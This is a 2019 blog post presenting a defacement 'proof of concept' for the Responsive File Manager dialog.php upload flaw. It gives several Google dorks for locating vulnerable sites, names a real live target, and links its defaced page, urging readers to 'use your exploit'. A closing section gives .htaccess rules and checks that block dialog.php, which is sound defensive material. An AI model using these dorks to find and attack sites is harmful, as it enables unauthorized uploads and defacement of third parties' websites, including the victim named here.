Deface PoC Responsive File Manager (RFM)
Wednesday, October 30, 2019
Hello friends, nice to meet you, I'm RomDhoni7. I'm sharing vulnerability information again, this time a Proof of Concept for RFM.
Does anyone already know about this RFM vulnerability? It allows an attacker to upload files through the Responsive File Manager plugin.
Dorks:
inurl:/filemanager/ intext:"dialog.php"
intitle:"index of filemanager" intext:dialog.php
inurl:/filemanager/dialog.php
inurl:/js/filemanager/ intext:"dialog.php"
inurl:/assets/filemanager/ intext:"dialog.php"
Exploit: dialog.php
Live target: https://www.homoeoadda.in
Now use your exploit.
Examples: site/[path]/filemanager/dialog.php
Result: https://www.homoeoadda.in/source/index.html
To protect against the RFM vulnerability, restrict access with .htaccess or simply delete the dialog.php file (or the whole filemanager directory) if the file manager is not needed.
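The .htaccess mitigation mentioned above, written out as an added example (this is not configuration from the original post or from the RFM project). It assumes Apache 2.4 with `AllowOverride` permitting `Files`/`Require` directives in .htaccess, and the IP range is a placeholder you replace with your own administrative network:

```apache
# Added example: block public access to RFM's dialog.php so the upload
# dialog cannot be reached from the internet. Place this .htaccess in the
# filemanager directory (or the site root, since <Files> matches by name).
# Assumes Apache 2.4 (Require syntax) and AllowOverride Limit/AuthConfig.
<Files "dialog.php">
    Require all denied
</Files>

# Alternative if administrators still need the file manager: allow only
# a trusted source range. 203.0.113.0/24 is a documentation placeholder;
# replace it with your real admin network.
# <Files "dialog.php">
#     Require ip 203.0.113.0/24
# </Files>
```

After deploying, verify from an outside address that a request for `/filemanager/dialog.php` returns 403, and check the Apache access log for any earlier hits on that path, since exposure of dialog.php is the indicator this post's dorks search for.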